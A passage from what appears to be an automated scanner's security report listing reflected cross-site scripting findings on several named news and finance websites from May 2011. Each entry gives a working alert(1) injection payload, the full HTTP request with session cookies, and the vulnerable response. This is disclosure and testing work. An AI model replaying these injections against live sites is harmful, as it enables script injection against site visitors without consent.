   this.noCacheDomain = "wvue.web.entriq.net";
   
   this.affiliateID
...[SNIP]...

2.122. http://www.collegesurfing.com/searchbox-mge-us.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /searchbox-mge-us.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68879"><script>alert(1)</script>7a0fb199d01 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchbox-mge-us.php?id=1282808868879"><script>alert(1)</script>7a0fb199d01&type=MGEUSDEST&style=&affiliatesearchboxid=7851&program_type= HTTP/1.1
Host: www.collegesurfing.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; PHPSESSID=3eicgiuhi2dvuo76dhkvncnek6; AFF_ID=6; AFF_URL=http%3A%2F%2Fwww.collegesurfing.com%2Fsearchbox-mge-us.php%3Fid%3D12828088%26type%3DMGEUSDEST%26style%3D%26affiliatesearchboxid%3D7851%26program_type%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11482

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/css/searchbox-mge-us.css" rel="stylesheet" type="text/css" />
   <script src="/js/dojo/dojo/dojo.js"></script>
</head>
<body>
<sc
...[SNIP]...
<input type="hidden" name="id" value="1282808868879"><script>alert(1)</script>7a0fb199d01">
...[SNIP]...

2.123. http://www.csmonitor.com/Business [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3b56"-alert(1)-"5f879a42391 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Businesse3b56"-alert(1)-"5f879a42391 HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; s_cc=true; s_nr=1304955268151-New; c_m=undefinedburpburp; rvd=1304955268153%3E0%3A1; rvd_s=1; s_depth=4; s_lv=1304955268156; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843268157%26vn%3D1; s_monthinvisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:35:00 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86376
Expires: Tue, 10 May 2011 15:34:37 GMT
Date: Mon, 09 May 2011 15:35:01 GMT
Connection: close
Content-Length: 31494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Businesse3b56"-alert(1)-"5f879a42391";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.124. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b75d3"-alert(1)-"e5051c0c7b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Businessb75d3"-alert(1)-"e5051c0c7b7/2011/0509/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:08 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:38:08 GMT
Date: Mon, 09 May 2011 15:38:08 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Businessb75d3"-alert(1)-"e5051c0c7b7/2011/0509/Gas-prices-start-to-head-down";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.125. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4befc"-alert(1)-"229bb0a2d73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Business/20114befc"-alert(1)-"229bb0a2d73/0509/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:13 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86399
Expires: Tue, 10 May 2011 15:38:12 GMT
Date: Mon, 09 May 2011 15:38:13 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Business/20114befc"-alert(1)-"229bb0a2d73/0509/Gas-prices-start-to-head-down";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.126. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48666"-alert(1)-"a40ab4b1207 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Business/2011/050948666"-alert(1)-"a40ab4b1207/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:17 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86397
Expires: Tue, 10 May 2011 15:38:14 GMT
Date: Mon, 09 May 2011 15:38:17 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Business/2011/050948666"-alert(1)-"a40ab4b1207/Gas-prices-start-to-head-down";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.127. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f5a"-alert(1)-"1903108f0c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Business/2011/0509/Gas-prices-start-to-head-down81f5a"-alert(1)-"1903108f0c0 HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:22 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:38:22 GMT
Date: Mon, 09 May 2011 15:38:22 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Business/2011/0509/Gas-prices-start-to-head-down81f5a"-alert(1)-"1903108f0c0";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.128. http://www.fox8live.com/widgets/serve.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /widgets/serve.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 225ed'-alert(1)-'5d65b809296 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/serve.aspx?wid=b9fd9b2c-4752-4433-8ab5-6a62e33475f4&ver=1&225ed'-alert(1)-'5d65b809296=1 HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:06 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n27), ms iad-agg-n27 ( origin)
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:42:07 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 9234
Connection: keep-alive
Content-Length: 9234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1">
...[SNIP]...
) && (IDMUtilsJS_Loaded)) {
Goto(searchval);
}
}
function Goto(searchval) {
var sFormat = 'click.ashx?type=business&name={0}&address=New Orleans, LA&wid=b9fd9b2c-4752-4433-8ab5-6a62e33475f4&ver=1&225ed'-alert(1)-'5d65b809296=1';
var sSubmitTarget = String.format(sFormat, searchval);
window.open(sSubmitTarget, "wSILSearch");
}

</script>
...[SNIP]...

2.129. http://www.macroaxis.com/widgets/url.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbb11"-alert(1)-"0ecdb942be3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC&cbb11"-alert(1)-"0ecdb942be3=1 HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=6B4341DCEBE25EE8018BA77B7EEF7E70; Path=/
Content-Length: 2480
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
y_frame' marginheight='0' marginwidth='0' SCROLLING='NO' height='174px' width='100%' frameborder='0' src='http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC&cbb11"-alert(1)-"0ecdb942be3=1'>
...[SNIP]...

2.130. http://www.macroaxis.com/widgets/url.jsp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171ae"-alert(1)-"dbac3ee73b3 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC171ae"-alert(1)-"dbac3ee73b3 HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=86336010BD34783C481AC7B25384C4BA; Path=/
Content-Length: 2477
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
ay_frame' marginheight='0' marginwidth='0' SCROLLING='NO' height='174px' width='100%' frameborder='0' src='http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC171ae"-alert(1)-"dbac3ee73b3'>
...[SNIP]...

2.131. http://www.macroaxis.com/widgets/url.jsp [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fb33'%3balert(1)//711c8836387 was submitted in the t parameter. This input was echoed as 6fb33';alert(1)//711c8836387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/url.jsp?t=266fb33'%3balert(1)//711c8836387&s=NYA,IXIC,GSPC HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=5933FD8D8BF7327889B529C2C6310415; Path=/
Content-Length: 2071
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
;
document.lastChild.firstChild.appendChild(stylesheet);
}

function requestContent( local ) {

var script = document.createElement('script');
script.src = CONTENT_URL + '?t=266fb33';alert(1)//711c8836387&f=f&url=' + escape(local || location.href);
document.getElementsByTagName('head')[0].appendChild(script);
}

   this.init = function() {
    this.serverResponse = function(data) {
    if (!d
...[SNIP]...

2.132. http://www.npr.org/templates/reg/forgot-password-submit.php [public_user_email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/reg/forgot-password-submit.php

Issue detail

The value of the public_user_email request parameter is copied into the HTML document as plain text between tags. The payload 933d3<script>alert(1)</script>6ad288fa3a4c51ff5 was submitted in the public_user_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /templates/reg/forgot-password-submit.php?public_user_email=933d3<script>alert(1)</script>6ad288fa3a4c51ff5&x=29&y=11 HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/forgot-password.php
Cache-Control: max-age=0
Origin: http://www.npr.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rosi=75c427ffc47b22e653233d7dc2cb9c00; __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=0
Expires: Mon, 09 May 2011 15:40:54 GMT
Content-Type: text/html
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 12982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>NPR: Forgot your p
...[SNIP]...
<strong>933d3<script>alert(1)</script>6ad288fa3a4c51ff5</strong>
...[SNIP]...

2.133. http://www.therepublic.com/assets/gzip.php [f0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The value of the f0 request parameter is copied into a JavaScript rest-of-line comment. The payload fd9b1%0aalert(1)//706f6bd3266 was submitted in the f0 parameter. This input was echoed as fd9b1
alert(1)//706f6bd3266
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.jsfd9b1%0aalert(1)//706f6bd3266&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:15 GMT
